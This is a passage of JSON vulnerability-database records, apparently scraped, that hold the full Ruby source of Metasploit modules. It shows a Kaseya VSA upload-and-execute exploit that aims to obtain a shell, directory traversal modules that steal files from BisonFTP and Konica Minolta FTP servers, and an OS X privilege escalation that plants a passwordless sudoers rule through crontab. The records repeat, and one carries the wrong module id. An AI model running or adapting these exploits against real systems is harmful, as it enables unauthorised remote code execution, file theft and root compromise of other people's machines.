ARCH_X86,\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Kaseya VSA v7 to v9.1', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 23 2015'))\n end\n\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('ConfigTab','uploader.aspx')\n })\n\n if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\\.asp\\?logout=([0-9]*)/\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Unknown\n end\n end\n\n\n def upload_file(payload, path, filename, session_id)\n print_status(\"Uploading payload to #{path}...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),\n 'vars_get' => {\n 'PathData' => path,\n 'qqfile' => filename\n },\n 'data' => payload,\n 'ctype' => 'application/octet-stream',\n 'cookie' => 'sessionId=' + session_id\n })\n\n if res && res.code == 200 && res.body && res.body.to_s.include?('\"success\": \"true\"')\n return true\n else\n return false\n end\n end\n\n\n def exploit\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('ConfigTab','uploader.aspx')\n })\n\n if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\\.asp\\?logout=([0-9]*)/\n session_id = $1\n else\n fail_with(Failure::NoAccess, \"#{peer} - Failed to create a valid session\")\n end\n\n asp_name = \"#{rand_text_alpha_lower(8)}.asp\"\n exe = generate_payload_exe\n payload = Msf::Util::EXE.to_exe_asp(exe).to_s\n\n paths = [\n # We have to guess the path, so just try the most common directories\n 'C:\\\\Kaseya\\\\WebPages\\\\',\n 'C:\\\\Program Files\\\\Kaseya\\\\WebPages\\\\',\n 'C:\\\\Program Files (x86)\\\\Kaseya\\\\WebPages\\\\',\n 'D:\\\\Kaseya\\\\WebPages\\\\',\n 'D:\\\\Program Files\\\\Kaseya\\\\WebPages\\\\',\n 'D:\\\\Program Files (x86)\\\\Kaseya\\\\WebPages\\\\',\n 'E:\\\\Kaseya\\\\WebPages\\\\',\n 'E:\\\\Program Files\\\\Kaseya\\\\WebPages\\\\',\n 'E:\\\\Program Files (x86)\\\\Kaseya\\\\WebPages\\\\',\n ]\n\n paths.each do |path|\n if upload_file(payload, path, asp_name, session_id)\n register_files_for_cleanup(path + asp_name)\n print_status(\"Executing payload #{asp_name}\")\n\n send_request_cgi({\n 'uri' => normalize_uri(asp_name),\n 'method' => 'GET'\n })\n\n # Failure. The request timed out or the server went away.\n break if res.nil?\n # Success! Triggered the payload, should have a shell incoming\n break if res.code == 200\n end\n end\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T00:25:33", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 58}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-21T02:25:34", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-21T02:25:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-21T02:25:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T02:25:34", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 59}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "8c633934351f84da22137da9ec2c53ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation", "description": "This module writes to the sudoers file without root access by exploiting rsh and malloc log files. Makes sudo require no password, giving access to su even if root is disabled. Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).\n", "published": "2015-10-16T21:39:07", "modified": "2018-11-04T05:28:32", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5889"], "cvelist": ["CVE-2015-5889"], "lastseen": "2019-06-24T20:25:26", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-21T02:25:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-21T02:25:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/rsh_libmalloc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',\n 'Description' => %q{\n This module writes to the sudoers file without root access by exploiting rsh and malloc log files.\n Makes sudo require no password, giving access to su even if root is disabled.\n Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).\n },\n 'Author' => [\n 'rebel', # Vulnerability discovery and PoC\n 'shandelman116' # Copy/paste AND translator monkey\n ],\n 'References' => [\n ['EDB', '38371'],\n ['CVE', '2015-5889']\n ],\n 'DisclosureDate' => 'Oct 1 2015',\n 'License' => MSF_LICENSE,\n # Want to ensure that this can be used on Python Meterpreter sessions as well\n 'Platform' => ['osx', 'python'],\n 'Arch' => [ARCH_X64, ARCH_PYTHON],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Privileged' => true,\n 'Targets' => [\n ['Mac OS X 10.9.5-10.10.5', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'osx/x64/shell_reverse_tcp'\n }\n ))\n\n register_options [\n OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Check OS\n os_check\n\n # Check if crontab file existed already so it can be restored at cleanup\n if file_exist? \"/etc/crontab\"\n @crontab_original = read_file(\"/etc/crontab\")\n else\n @crontab_original = nil\n end\n\n # Writing payload\n if payload.arch.include?(ARCH_X64)\n vprint_status(\"Writing payload to #{payload_file}.\")\n write_file(payload_file, payload_source)\n vprint_status(\"Finished writing payload file.\")\n register_file_for_cleanup(payload_file)\n elsif payload.arch.include?(ARCH_PYTHON)\n vprint_status(\"No need to write payload. Will simply execute after exploit\")\n vprint_status(\"Payload encodeded is #{payload.encoded}\")\n end\n\n # Run exploit\n sploit\n\n # Execute payload\n print_status('Executing payload...')\n if payload.arch.include?(ARCH_X64)\n cmd_exec(\"chmod +x #{payload_file}; #{payload_file} & disown\")\n elsif payload.arch.include?(ARCH_PYTHON)\n cmd_exec(\"python -c \\\"#{payload.encoded}\\\" & disown\")\n end\n vprint_status(\"Finished executing payload.\")\n end\n\n def os_check\n # Get sysinfo\n sysinfo = get_sysinfo\n # Make sure its OS X (Darwin)\n unless sysinfo[\"Kernel\"].include? \"Darwin\"\n print_warning(\"The target system does not appear to be running OS X!\")\n print_warning(\"Kernel information: #{sysinfo['Kernel']}\")\n return\n end\n # Make sure its not greater than 10.5 or less than 9.5\n version = sysinfo[\"ProductVersion\"]\n minor_version = version[3...version.length].to_f\n unless minor_version >= 9.5 && minor_version <= 10.5\n print_warning(\"The target version of OS X does not appear to be compatible with the exploit!\")\n print_warning(\"Target is running OS X #{sysinfo['ProductVersion']}\")\n end\n end\n\n def sploit\n user = cmd_exec(\"whoami\").chomp\n vprint_status(\"The current effective user is #{user}. Starting the sploit\")\n # Get size of sudoers file\n sudoer_path = \"/etc/sudoers\"\n size = get_stat_size(sudoer_path)\n\n # Set up the environment and command for spawning rsh and writing to crontab file\n rb_script = \"e={\\\"MallocLogFile\\\"=>\\\"/etc/crontab\\\",\\\"MallocStackLogging\\\"=>\\\"yes\\\",\\\"MallocStackLoggingDirectory\\\"=>\\\"a\\n* * * * * root echo \\\\\\\"ALL ALL=(ALL) NOPASSWD: ALL\\\\\\\" >> /etc/sudoers\\n\\n\\n\\n\\n\\\"}; Process.spawn(e,[\\\"/usr/bin/rsh\\\",\\\"rsh\\\"],\\\"localhost\\\",[:out, :err]=>\\\"/dev/null\\\")\"\n rb_cmd = \"ruby -e '#{rb_script}'\"\n\n # Attempt to execute\n print_status(\"Attempting to write /etc/crontab...\")\n cmd_exec(rb_cmd)\n vprint_status(\"Now to check whether the script worked...\")\n\n # Check whether it worked\n crontab = read_file(\"/etc/crontab\")\n vprint_status(\"Reading crontab yielded the following response: #{crontab}\")\n unless crontab.include? \"ALL ALL=(ALL) NOPASSWD: ALL\"\n vprint_error(\"Bad news... it did not write to the file.\")\n fail_with(Failure::NotVulnerable, \"Could not successfully write to crontab file.\")\n end\n\n print_good(\"Succesfully wrote to crontab file!\")\n\n # Wait for sudoers to change\n new_size = get_stat_size(sudoer_path)\n print_status(\"Waiting for sudoers file to change...\")\n\n # Start timeout block\n begin\n Timeout.timeout(datastore['WaitTime']) {\n while new_size <= size\n Rex.sleep(1)\n new_size = get_stat_size(sudoer_path)\n end\n }\n rescue Timeout::Error\n fail_with(Failure::TimeoutExpired, \"Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.\")\n end\n print_good(\"Sudoers file has changed!\")\n\n # Confirming root access\n print_status(\"Attempting to start root shell...\")\n cmd_exec(\"sudo -s su\")\n user = cmd_exec(\"whoami\")\n unless user.include? \"root\"\n fail_with(Failure::UnexpectedReply, \"Unable to acquire root access. Whoami returned: #{user}\")\n end\n print_good(\"Success! Acquired root access!\")\n end\n\n def get_stat_size(file_path)\n cmd = \"env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'\"\n response = cmd_exec(cmd)\n vprint_status(\"Response to stat size query is #{response}\")\n begin\n size = Integer(response)\n return size\n rescue ArgumentError\n fail_with(Failure::UnexpectedReply, \"Could not get stat size!\")\n end\n end\n\n def payload_source\n if payload.arch.include?(ARCH_X64)\n return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n elsif payload.arch.include?(ARCH_PYTHON)\n return payload.encoded\n end\n end\n\n def payload_file\n @payload_file ||= \"#{base_dir}/#{Rex::Text.rand_text_alpha(8)}\"\n end\n\n def cleanup\n vprint_status(\"Starting the cron restore process...\")\n super\n # Restore crontab back to is original state\n # If we don't do this, then cron will continue to append the no password rule to sudoers.\n if @crontab_original.nil?\n # Erase crontab file and kill cron process since it did not exist before\n vprint_status(\"Killing cron process and removing crontab file since it did not exist prior to exploit.\")\n rm_ret = cmd_exec(\"rm /etc/crontab 2>/dev/null; echo $?\")\n if rm_ret.chomp.to_i == 0\n vprint_good(\"Successfully removed crontab file!\")\n else\n print_warning(\"Could not remove crontab file.\")\n end\n Rex.sleep(1)\n kill_ret = cmd_exec(\"killall cron 2>/dev/null; echo $?\")\n if kill_ret.chomp.to_i == 0\n vprint_good(\"Succesfully killed cron!\")\n else\n print_warning(\"Could not kill cron process.\")\n end\n else\n # Write back the original content of crontab\n vprint_status(\"Restoring crontab file back to original contents. No need for it anymore.\")\n cmd_exec(\"echo '#{@crontab_original}' > /etc/crontab\")\n end\n vprint_status(\"Finished the cleanup process.\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-24T20:25:26", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 60}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-25T00:24:41", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-25T00:24:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-25T00:24:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-25T00:24:41", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 61}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "e6a0cb741398882322ccd7a3801fca77", "type": "metasploit", "bulletinFamily": "exploit", "title": "Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'\n", "published": "2015-11-12T23:51:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7603", "http://shinnai.altervista.org/exploits/SH-0024-20150922.html"], "cvelist": ["CVE-2015-7603"], "lastseen": "2019-06-27T00:26:34", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-25T00:24:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-25T00:24:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf\n 'James Fitts', # msf\n 'Brad Wolfe <brad.wolfe[at]gmail.com>', # msf\n 'shinnai' # initial discovery\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38260'],\n [ 'CVE', '2015-7603'],\n [ 'URL', 'http://shinnai.altervista.org/exploits/SH-0024-20150922.html']\n ],\n 'DisclosureDate' => 'Sep 22 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /FTP Utility FTP server \\(Version 1\\.00\\)/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! (res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"konica.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T00:26:34", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 62}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-27T02:37:42", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-27T02:37:42"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-27T02:37:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n 